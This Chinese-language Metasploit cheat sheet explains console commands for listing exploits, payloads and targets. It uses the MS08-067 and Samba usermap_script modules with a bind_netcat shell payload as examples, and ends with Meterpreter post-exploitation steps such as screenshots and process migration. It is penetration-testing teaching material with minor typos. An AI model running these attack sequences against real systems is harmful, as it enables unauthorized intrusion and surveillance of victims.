msf > show exploits
列Metasploip的所有可用的渗透测试框架。在MSF终端中可以针对渗透测试中发现的安全漏洞来实施相应的渗透攻击。
msf > show auxiliary
列出所有的辅助模块以及他们的用途。
msf > show options
用来保证Metasploit框架中的各个模块正确运行所需的设置。
例如:当你选择一个模块
msf > use windows/smb/ms08_067_netapi
然后:
msf exploit(ms08_067_netapi) > show options
小技巧: 使用back回退到 msg >
msf > search mssql
搜索某个特定的渗透攻击、辅助或攻击载荷
msf > show payloads
列出所有的攻击载荷
在使用一个渗透模块时使用会列出适合这个模块的攻击载荷
msf > show targets
Metasploit的渗透攻击模块通常可以列出受到漏洞影响目标系统的类型。简单来说攻击仅针对特定的操作系统版本,且只适用于特定的补丁级别、语言版本以及安全机制实现。
msf exploit(ms08_067_netapi) > info
列出ms08_067_netapi模块的详细信息
Metasploit模块中所有参数只有两个状态:已设置(set)或未设置(unset)
setg命令和unsetg命令能够对全局参数进行设置或清除
使用save命令可以将setg命令对全局参数的设置保存,下次MSF终端启动时还可以使用这些设置值
模块列表4个参数的意义:
Name Current Setting Required Description
模块名 当前的设置 必输项(yes,no) 描述
Metasploit下扫描漏洞
msf > nmap -sT -A -script=smb-check-vulns -PO 192.168.1.102
全端口攻击载荷:
Meterpreter ("黑客瑞士军刀") 基本命令
成功入侵系统并获得系统的Meterpreter会话之后,我们可以利用一些基本的Meterpreter的帮助命令,来收集更多的信息
meterpreter > screenshot
获取当前活动用户的桌面截图保存到opt/metasploit3/msf3/下
msfcli multi/samba/usermap_script S
对选定的渗透攻击模块显示详细信息
msfcli multi/samba/usermap_script P
查看可用的攻击模块
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat O
选择一个攻击载荷,并查看需要设置的配置参数
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat T
查看渗透攻击模块的目标类型列表
以option=value的方式设置所需要设置的配置参数,并以E模式来执行这次渗透攻击
Meterpreter有效载荷命令:
Meterpreter > ps
列出渗透机的所有进程
Meterpreter > migrate 1420
Meterpreter通常会在已被攻击进程的内存中运行,所有最好将进程转移到一个长久进程中。
meterpreter > sysinfo
获取系统信息